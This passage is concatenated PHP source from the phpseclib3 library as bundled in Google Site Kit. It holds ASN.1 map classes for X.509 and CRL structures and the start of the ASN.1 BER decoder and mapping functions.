\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\BuiltInDomainDefinedAttributes::MAP, 'extension-attributes' => ['optional' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ExtensionAttributes::MAP]]; } <?php /** * KeyPurposeId * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * KeyPurposeId * * @author Jim Wigginton <terrafrost@php.net> */ abstract class KeyPurposeId { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER]; } <?php /** * FieldID * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * FieldID * * @author Jim Wigginton <terrafrost@php.net> */ abstract class FieldID { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['fieldType' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER], 'parameters' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_ANY, 'optional' => \true]]]; } <?php /** * PrivateDomainName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PrivateDomainName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PrivateDomainName { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, 'children' => ['numeric' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_NUMERIC_STRING], 'printable' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING]]]; } <?php /** * DirectoryString * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * DirectoryString * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DirectoryString { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, 'children' => ['teletexString' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_TELETEX_STRING], 'printableString' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING], 'universalString' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UNIVERSAL_STRING], 'utf8String' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING], 'bmpString' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BMP_STRING]]]; } <?php /** * DSAParams * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * DSAParams * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DSAParams { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['p' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'q' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'g' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]]]; } <?php /** * CertPolicyId * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CertPolicyId * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CertPolicyId { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER]; } <?php /** * RSAPublicKey * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * RSAPublicKey * * @author Jim Wigginton <terrafrost@php.net> */ abstract class RSAPublicKey { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['modulus' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'publicExponent' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]]]; } <?php /** * CRLReason * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CRLReason * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CRLReason { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_ENUMERATED, 'mapping' => [ 'unspecified', 'keyCompromise', 'cACompromise', 'affiliationChanged', 'superseded', 'cessationOfOperation', 'certificateHold', // Value 7 is not used. 8 => 'removeFromCRL', 'privilegeWithdrawn', 'aACompromise', ]]; } <?php /** * RevokedCertificate * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * RevokedCertificate * * @author Jim Wigginton <terrafrost@php.net> */ abstract class RevokedCertificate { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['userCertificate' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertificateSerialNumber::MAP, 'revocationDate' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Time::MAP, 'crlEntryExtensions' => ['optional' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Extensions::MAP]]; } <?php /** * BaseDistance * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * BaseDistance * * @author Jim Wigginton <terrafrost@php.net> */ abstract class BaseDistance { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]; } <?php /** * TBSCertList * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * TBSCertList * * @author Jim Wigginton <terrafrost@php.net> */ abstract class TBSCertList { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['version' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'mapping' => ['v1', 'v2'], 'optional' => \true, 'default' => 'v1'], 'signature' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'issuer' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Name::MAP, 'thisUpdate' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Time::MAP, 'nextUpdate' => ['optional' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Time::MAP, 'revokedCertificates' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'optional' => \true, 'min' => 0, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RevokedCertificate::MAP], 'crlExtensions' => ['constant' => 0, 'optional' => \true, 'explicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Extensions::MAP]]; } <?php /** * CertificatePolicies * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CertificatePolicies * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CertificatePolicies { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PolicyInformation::MAP]; } <?php /** * ASN.1 Raw Element * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2012 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * ASN.1 Raw Element * * An ASN.1 ANY mapping will return an ASN1\Element object. Use of this object * will also bypass the normal encoding rules in ASN1::encodeDER() * * @author Jim Wigginton <terrafrost@php.net> */ class Element { /** * Raw element value * * @var string */ public $element; /** * Constructor * * @param string $encoded * @return Element */ public function __construct($encoded) { $this->element = $encoded; } } <?php /** * Pure-PHP ASN.1 Parser * * PHP version 5 * * ASN.1 provides the semantics for data encoded using various schemes. The most commonly * utilized scheme is DER or the "Distinguished Encoding Rules". PEM's are base64 encoded * DER blobs. * * \phpseclib3\File\ASN1 decodes and encodes DER formatted messages and places them in a semantic context. * * Uses the 1988 ASN.1 syntax. * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2012 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Pure-PHP ASN.1 Parser * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ASN1 { // Tag Classes // http://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#page=12 const CLASS_UNIVERSAL = 0; const CLASS_APPLICATION = 1; const CLASS_CONTEXT_SPECIFIC = 2; const CLASS_PRIVATE = 3; // Tag Classes // http://www.obj-sys.com/asn1tutorial/node124.html const TYPE_BOOLEAN = 1; const TYPE_INTEGER = 2; const TYPE_BIT_STRING = 3; const TYPE_OCTET_STRING = 4; const TYPE_NULL = 5; const TYPE_OBJECT_IDENTIFIER = 6; //const TYPE_OBJECT_DESCRIPTOR = 7; //const TYPE_INSTANCE_OF = 8; // EXTERNAL const TYPE_REAL = 9; const TYPE_ENUMERATED = 10; //const TYPE_EMBEDDED = 11; const TYPE_UTF8_STRING = 12; //const TYPE_RELATIVE_OID = 13; const TYPE_SEQUENCE = 16; // SEQUENCE OF const TYPE_SET = 17; // SET OF // More Tag Classes // http://www.obj-sys.com/asn1tutorial/node10.html const TYPE_NUMERIC_STRING = 18; const TYPE_PRINTABLE_STRING = 19; const TYPE_TELETEX_STRING = 20; // T61String const TYPE_VIDEOTEX_STRING = 21; const TYPE_IA5_STRING = 22; const TYPE_UTC_TIME = 23; const TYPE_GENERALIZED_TIME = 24; const TYPE_GRAPHIC_STRING = 25; const TYPE_VISIBLE_STRING = 26; // ISO646String const TYPE_GENERAL_STRING = 27; const TYPE_UNIVERSAL_STRING = 28; //const TYPE_CHARACTER_STRING = 29; const TYPE_BMP_STRING = 30; // Tag Aliases // These tags are kinda place holders for other tags. const TYPE_CHOICE = -1; const TYPE_ANY = -2; /** * ASN.1 object identifiers * * @var array * @link http://en.wikipedia.org/wiki/Object_identifier */ private static $oids = []; /** * ASN.1 object identifier reverse mapping * * @var array */ private static $reverseOIDs = []; /** * Default date format * * @var string * @link http://php.net/class.datetime */ private static $format = 'D, d M Y H:i:s O'; /** * Filters * * If the mapping type is self::TYPE_ANY what do we actually encode it as? * * @var array * @see self::encode_der() */ private static $filters; /** * Current Location of most recent ASN.1 encode process * * Useful for debug purposes * * @var array * @see self::encode_der() */ private static $location; /** * DER Encoded String * * In case we need to create ASN1\Element object's.. * * @var string * @see self::decodeDER() */ private static $encoded; /** * Type mapping table for the ANY type. * * Structured or unknown types are mapped to a \phpseclib3\File\ASN1\Element. * Unambiguous types get the direct mapping (int/real/bool). * Others are mapped as a choice, with an extra indexing level. * * @var array */ const ANY_MAP = [ self::TYPE_BOOLEAN => \true, self::TYPE_INTEGER => \true, self::TYPE_BIT_STRING => 'bitString', self::TYPE_OCTET_STRING => 'octetString', self::TYPE_NULL => 'null', self::TYPE_OBJECT_IDENTIFIER => 'objectIdentifier', self::TYPE_REAL => \true, self::TYPE_ENUMERATED => 'enumerated', self::TYPE_UTF8_STRING => 'utf8String', self::TYPE_NUMERIC_STRING => 'numericString', self::TYPE_PRINTABLE_STRING => 'printableString', self::TYPE_TELETEX_STRING => 'teletexString', self::TYPE_VIDEOTEX_STRING => 'videotexString', self::TYPE_IA5_STRING => 'ia5String', self::TYPE_UTC_TIME => 'utcTime', self::TYPE_GENERALIZED_TIME => 'generalTime', self::TYPE_GRAPHIC_STRING => 'graphicString', self::TYPE_VISIBLE_STRING => 'visibleString', self::TYPE_GENERAL_STRING => 'generalString', self::TYPE_UNIVERSAL_STRING => 'universalString', //self::TYPE_CHARACTER_STRING => 'characterString', self::TYPE_BMP_STRING => 'bmpString', ]; /** * String type to character size mapping table. * * Non-convertable types are absent from this table. * size == 0 indicates variable length encoding. * * @var array */ const STRING_TYPE_SIZE = [self::TYPE_UTF8_STRING => 0, self::TYPE_BMP_STRING => 2, self::TYPE_UNIVERSAL_STRING => 4, self::TYPE_PRINTABLE_STRING => 1, self::TYPE_TELETEX_STRING => 1, self::TYPE_IA5_STRING => 1, self::TYPE_VISIBLE_STRING => 1]; /** * Parse BER-encoding * * Serves a similar purpose to openssl's asn1parse * * @param Element|string $encoded * @return ?array */ public static function decodeBER($encoded) { if ($encoded instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element) { $encoded = $encoded->element; } self::$encoded = $encoded; $decoded = self::decode_ber($encoded); if ($decoded === \false) { return null; } return [$decoded]; } /** * Parse BER-encoding (Helper function) * * Sometimes we want to get the BER encoding of a particular tag. $start lets us do that without having to reencode. * $encoded is passed by reference for the recursive calls done for self::TYPE_BIT_STRING and * self::TYPE_OCTET_STRING. In those cases, the indefinite length is used. * * @param string $encoded * @param int $start * @param int $encoded_pos * @return array|bool */ private static function decode_ber($encoded, $start = 0, $encoded_pos = 0) { $current = ['start' => $start]; if (!isset($encoded[$encoded_pos])) { return \false; } $type = \ord($encoded[$encoded_pos++]); $startOffset = 1; $constructed = $type >> 5 & 1; $tag = $type & 0x1f; if ($tag == 0x1f) { $tag = 0; // process septets (since the eighth bit is ignored, it's not an octet) do { if (!isset($encoded[$encoded_pos])) { return \false; } $temp = \ord($encoded[$encoded_pos++]); $startOffset++; $loop = $temp >> 7; $tag <<= 7; $temp &= 0x7f; // "bits 7 to 1 of the first subsequent octet shall not all be zero" if ($startOffset == 2 && $temp == 0) { return \false; } $tag |= $temp; } while ($loop); } $start += $startOffset; // Length, as discussed in paragraph 8.1.3 of X.690-0207.pdf#page=13 if (!isset($encoded[$encoded_pos])) { return \false; } $length = \ord($encoded[$encoded_pos++]); $start++; if ($length == 0x80) { // indefinite length // "[A sender shall] use the indefinite form (see 8.1.3.6) if the encoding is constructed and is not all // immediately available." -- paragraph 8.1.3.2.c $length = \strlen($encoded) - $encoded_pos; } elseif ($length & 0x80) { // definite length, long form // technically, the long form of the length can be represented by up to 126 octets (bytes), but we'll only // support it up to four. $length &= 0x7f; $temp = \substr($encoded, $encoded_pos, $length); $encoded_pos += $length; // tags of indefinte length don't really have a header length; this length includes the tag $current += ['headerlength' => $length + 2]; $start += $length; \extract(\unpack('Nlength', \substr(\str_pad($temp, 4, \chr(0), \STR_PAD_LEFT), -4))); /** @var integer $length */ } else { $current += ['headerlength' => 2]; } if ($length > \strlen($encoded) - $encoded_pos) { return \false; } $content = \substr($encoded, $encoded_pos, $length); $content_pos = 0; // at this point $length can be overwritten. it's only accurate for definite length things as is /* Class is UNIVERSAL, APPLICATION, PRIVATE, or CONTEXT-SPECIFIC. The UNIVERSAL class is restricted to the ASN.1 built-in types. It defines an application-independent data type that must be distinguishable from all other data types. The other three classes are user defined. The APPLICATION class distinguishes data types that have a wide, scattered use within a particular presentation context. PRIVATE distinguishes data types within a particular organization or country. CONTEXT-SPECIFIC distinguishes members of a sequence or set, the alternatives of a CHOICE, or universally tagged set members. Only the class number appears in braces for this data type; the term CONTEXT-SPECIFIC does not appear. -- http://www.obj-sys.com/asn1tutorial/node12.html */ $class = $type >> 6 & 3; switch ($class) { case self::CLASS_APPLICATION: case self::CLASS_PRIVATE: case self::CLASS_CONTEXT_SPECIFIC: if (!$constructed) { return ['type' => $class, 'constant' => $tag, 'content' => $content, 'length' => $length + $start - $current['start']] + $current; } $newcontent = []; $remainingLength = $length; while ($remainingLength > 0) { $temp = self::decode_ber($content, $start, $content_pos); if ($temp === \false) { break; } $length = $temp['length']; // end-of-content octets - see paragraph 8.1.5 if (\substr($content, $content_pos + $length, 2) == "\x00\x00") { $length += 2; $start += $length; $newcontent[] = $temp; break; } $start += $length; $remainingLength -= $length; $newcontent[] = $temp; $content_pos += $length; } return [ 'type' => $class, 'constant' => $tag, // the array encapsulation is for BC with the old format 'content' => $newcontent, // the only time when $content['headerlength'] isn't defined is when the length is indefinite. // the absence of $content['headerlength'] is how we know if something is indefinite or not. // technically, it could be defined to be 2 and then another indicator could be used but whatever. 'length' => $start - $current['start'], ] + $current; } $current += ['type' => $tag]; // decode UNIVERSAL tags switch ($tag) { case self::TYPE_BOOLEAN: // "The contents octets shall consist of a single octet." -- paragraph 8.2.1 if ($constructed || \strlen($content) != 1) { return \false; } $current['content'] = (bool) \ord($content[$content_pos]); break; case self::TYPE_INTEGER: case self::TYPE_ENUMERATED: if ($constructed) { return \false; } $current['content'] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\substr($content, $content_pos), -256); break; case self::TYPE_REAL: // not currently supported return \false; case self::TYPE_BIT_STRING: // The initial octet shall encode, as an unsigned binary integer with bit 1 as the least significant bit, // the number of unused bits in the final subsequent octet. The number shall be in the range zero to // seven. if (!$constructed) { $current['content'] = \substr($content, $content_pos); } else { $temp = self::decode_ber($content, $start, $content_pos); if ($temp === \false) { return \false; } $length -= \strlen($content) - $content_pos; $last = \count($temp) - 1; for ($i = 0; $i < $last; $i++) { // all subtags should be bit strings if ($temp[$i]['type'] != self::TYPE_BIT_STRING) { return \false; } $current['content'] .= \substr($temp[$i]['content'], 1); } // all subtags should be bit strings if ($temp[$last]['type'] != self::TYPE_BIT_STRING) { return \false; } $current['content'] = $temp[$last]['content'][0] . $current['content'] . \substr($temp[$i]['content'], 1); } break; case self::TYPE_OCTET_STRING: if (!$constructed) { $current['content'] = \substr($content, $content_pos); } else { $current['content'] = ''; $length = 0; while (\substr($content, $content_pos, 2) != "\x00\x00") { $temp = self::decode_ber($content, $length + $start, $content_pos); if ($temp === \false) { return \false; } $content_pos += $temp['length']; // all subtags should be octet strings if ($temp['type'] != self::TYPE_OCTET_STRING) { return \false; } $current['content'] .= $temp['content']; $length += $temp['length']; } if (\substr($content, $content_pos, 2) == "\x00\x00") { $length += 2; // +2 for the EOC } } break; case self::TYPE_NULL: // "The contents octets shall not contain any octets." -- paragraph 8.8.2 if ($constructed || \strlen($content)) { return \false; } break; case self::TYPE_SEQUENCE: case self::TYPE_SET: if (!$constructed) { return \false; } $offset = 0; $current['content'] = []; $content_len = \strlen($content); while ($content_pos < $content_len) { // if indefinite length construction was used and we have an end-of-content string next // see paragraphs 8.1.1.3, 8.1.3.2, 8.1.3.6, 8.1.5, and (for an example) 8.6.4.2 if (!isset($current['headerlength']) && \substr($content, $content_pos, 2) == "\x00\x00") { $length = $offset + 2; // +2 for the EOC break 2; } $temp = self::decode_ber($content, $start + $offset, $content_pos); if ($temp === \false) { return \false; } $content_pos += $temp['length']; $current['content'][] = $temp; $offset += $temp['length']; } break; case self::TYPE_OBJECT_IDENTIFIER: if ($constructed) { return \false; } $current['content'] = self::decodeOID(\substr($content, $content_pos)); if ($current['content'] === \false) { return \false; } break; /* Each character string type shall be encoded as if it had been declared: [UNIVERSAL x] IMPLICIT OCTET STRING -- X.690-0207.pdf#page=23 (paragraph 8.21.3) Per that, we're not going to do any validation. If there are any illegal characters in the string, we don't really care */ case self::TYPE_NUMERIC_STRING: // 0,1,2,3,4,5,6,7,8,9, and space case self::TYPE_PRINTABLE_STRING: // Upper and lower case letters, digits, space, apostrophe, left/right parenthesis, plus sign, comma, // hyphen, full stop, solidus, colon, equal sign, question mark case self::TYPE_TELETEX_STRING: // The Teletex character set in CCITT's T61, space, and delete // see http://en.wikipedia.org/wiki/Teletex#Character_sets case self::TYPE_VIDEOTEX_STRING: // The Videotex character set in CCITT's T.100 and T.101, space, and delete case self::TYPE_VISIBLE_STRING: // Printing character sets of international ASCII, and space case self::TYPE_IA5_STRING: // International Alphabet 5 (International ASCII) case self::TYPE_GRAPHIC_STRING: // All registered G sets, and space case self::TYPE_GENERAL_STRING: // All registered C and G sets, space and delete case self::TYPE_UTF8_STRING: // ???? case self::TYPE_BMP_STRING: if ($constructed) { return \false; } $current['content'] = \substr($content, $content_pos); break; case self::TYPE_UTC_TIME: case self::TYPE_GENERALIZED_TIME: if ($constructed) { return \false; } $current['content'] = self::decodeTime(\substr($content, $content_pos), $tag); break; default: return \false; } $start += $length; // ie. length is the length of the full TLV encoding - it's not just the length of the value return $current + ['length' => $start - $current['start']]; } /** * ASN.1 Map * * Provides an ASN.1 semantic mapping ($mapping) from a parsed BER-encoding to a human readable format. * * "Special" mappings may be applied on a per tag-name basis via $special. * * @param array $decoded * @param array $mapping * @param array $special * @return array|bool|Element|string|null */ public static function asn1map(array $decoded, $mapping, $special = []) { if (isset($mapping['explicit']) && \is_array($decoded['content'])) { $decoded = $decoded['content'][0]; } switch (\true) { case $mapping['type'] == self::TYPE_ANY: $intype = $decoded['type']; // !isset(self::ANY_MAP[$intype]) produces a fatal error on PHP 5.6 if (isset($decoded['constant']) || !\array_key_exists($intype, self::ANY_MAP) || \ord(self::$encoded[$decoded['start']]) & 0x20) { return new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(\substr(self::$encoded, $decoded['start'], $decoded['length'])); } $inmap = self::ANY_MAP[$intype]; if (\is_string($inmap)) { return [$inmap => self::asn1map($decoded, ['type' => $intype] + $mapping, $special)]; } break; case $mapping['type'] == self::TYPE_CHOICE: foreach ($mapping['children'] as $key => $option) { switch (\true) { case isset($option['constant']) && $option['constant'] == $decoded['constant']: case !isset($option['constant']) && $option['type'] == $decoded['type']: $value = self::asn1map($decoded, $option, $special); break; case !isset($option['constant']) && $option['type'] == self::TYPE_CHOICE: $v = self::asn1map($decoded, $option, $special); if (isset($v)) { $value = $v; } } if (isset($value)) { if (isset($special[$key])) { $value = $special[$key]($value); } return [$key => $value]; } } return null; case isset($mapping['implicit']): case isset($mapping['explicit']): case $decoded['type'] == $mapping['type']: break; default: // if $decoded['type'] and $mapping['type'] are both strings, but different types of strings, // let it through switch (\true) { case $decoded['type'] < 18: // self::TYPE_NUMERIC_STRING == 18 case $decoded['type'] > 30: // self::TYPE_BMP_STRING == 30 case $mapping['type'] < 18: case $mapping['type'] > 30: return null; } } if (isset($mapping['implicit'])) { $decoded['type'] = $mapping['type']; } switch ($decoded['type']) { case self::TYPE_SEQUENCE: $map = []; // ignore the min and max if (isset($mapping['min']) && isset($mapping['max'])) { $child = $mapping['children']; foreach ($decoded['content'] as $content) { if (($map[] = self::asn1map($content, $child, $special)) === null) { return null; } } return $map; } $n = \count($decoded['content']); $i = 0; foreach ($mapping['children'] as $key => $child) { $maymatch = $i < $n; // Match only existing input. if ($maymatch) { $temp = $decoded['content'][$i]; if ($child['type'] != self::TYPE_CHOICE) { // Get the mapping and input class & constant. $childClass = $tempClass = self::CLASS_UNIVERSAL; $constant = null; if (isset($temp['constant'])) { $tempClass = $temp['type']; } if (isset($child['class'])) { $childClass = $child['class']; $constant = $child['cast']; } elseif (isset($child['constant'])) { $childClass = self::CLASS_CONTEXT_SPECIFIC; $constant = $child['constant']; } if (isset($constant) && isset($temp['constant'])) { // Can only match if constants and class match. $maymatch = $constant == $temp['constant'] && $childClass == $tempClass; } else { // Can only match if no constant expected and type matches or is generic. $maymatch = !isset($child['constant']) && \array_search($child['type'], [$temp['type'], self::TYPE_ANY, self::TYPE_CHOICE]) !== \false; } } } if ($maymatch) { // Attempt submapping. $candidate = self::asn1map($temp, $child, $special); $maymatch = $candidate !== null; } if ($maymatch) { // Got the match: use it. if (isset($special[$key])) { $candidate = $special[$key]($candidate); } $map[$key] = $candidate; $i++; } elseif (isset($child['default'])) { $map[$key] = $child['default']; } elseif (!isset($child['optional'])) { return null; // Syntax error. } } // Fail mapping if all input items have not been consumed. return $i < $n ? null : $map; // the main diff between sets and sequences is the encapsulation of the foreach in another for loop case self::TYPE_SET: $map = []; // ignore the min and max if (isset($mapping['min']) && isset($mapping['max'])) { $child = $mapping['children']; foreach ($decoded['content'] as $content) { if (($map[] = self::asn1map($content, $child, $special)) === null) { return null; } } return $map; } for ($i = 0; $i < \count($decoded['content']); $i++) { $temp = $decoded['content'][$i]; $tempClass = self::CLASS_UNIVERSAL; if (isset($temp['constant'])) { $tempClass = $temp['type']; } foreach ($mapping['children'] as $key => $child) { if (isset($map[$key])) { continue; } $maymatch = \true; if ($child['type'] != self::TYPE_CHOICE) { $childClass = self::CLASS_UNIVERSAL; $constant = null; if (isset($child['class'])) { $childClass = $child['class']; $constant = $child['cast']; } elseif (isset($child['constant'])) { $childClass = self::CLASS_CONTEXT_SPECIFIC; $constant = $child['constant']; } if (isset($constant) && isset($temp['constant'])) { // Can only match if constants and class match. $maymatch = $constant == $temp['constant'] && $childClass == $tempClass; } else { // Can only match if no constant expected and type matches or is generic. $maymatch = !isset($child['constant']) && \array_search($child['type'], [$temp['type'], self::TYPE_ANY, self::TYPE_CHOICE]) !== \false; } } if ($maymatch) { // Attempt submapping. $candidate = self::asn1map($temp, $child, $special); $maymatch = $candidate !== null; } if (!$maymatch) { break; } // Got the match: use it. if (isset($special[$key])) { $candidate = $special[$key]($candidate); } $map[$key] = $candidate; break; } } foreach ($mapping['children'] as $key => $child) { if (!isset($map[$key])) { if (isset($child['default'])) { $map[$key] = $child['default']; } elseif (!isset($child['optional'])) { return null; } } } return $map; case self::TYPE_OBJECT_IDENTIFIER: return isset(self::$oids[$decoded['content']]) ? self::$oids[$decoded['content']] : $decoded['content']; case self::TYPE_UTC_TIME: case self::TYPE_GENERALIZED_TIME: // for explicitly tagged optional stuff if (\is_array($decoded['content'])) { $decoded['content'] = $decoded['content'][0]['content']; } // for implicitly tagged optional stuff // in theory, doing isset($mapping['implicit']) would work but malformed certs do exist // in the wild that OpenSSL decodes without issue so we'll support them as well if (!\is_object($decoded['content'])) { $decoded['content'] = self::decodeTime($decoded['content'], $decoded['type']); } return $decoded['content'] ? $decoded['content']->format(self::$format) : \false; case self::TYPE_BIT_STRING: if (isset($mapping['mapping'])) { $offset = \ord($decoded['content'][0]); $size = (\strlen($decoded['content']) - 1) * 8 - $offset; /* From X.680-0207.pdf#page=46 (21.7): "When a "NamedBitList" is used in defining a bitstring type ASN.1 encoding rules are free to add (or remove) arbitrarily any trailing 0 bits to (or from) values that are being encoded or decoded. Application designers should therefore ensure that different semantics are not associated with such values which differ only in the number of trailing 0 bits." */ $bits = \count($mapping['mapping']) == $size ? [] : \array_fill(0, \count($mapping['mapping']) - $size, \false); for ($i = \strlen($decoded['content']) - 1; $i > 0; $i--) { $current = \ord($decoded['content'][$i]); for ($j = $offset; $j < 8; $j++) { $bits[] = (bool) ($current & 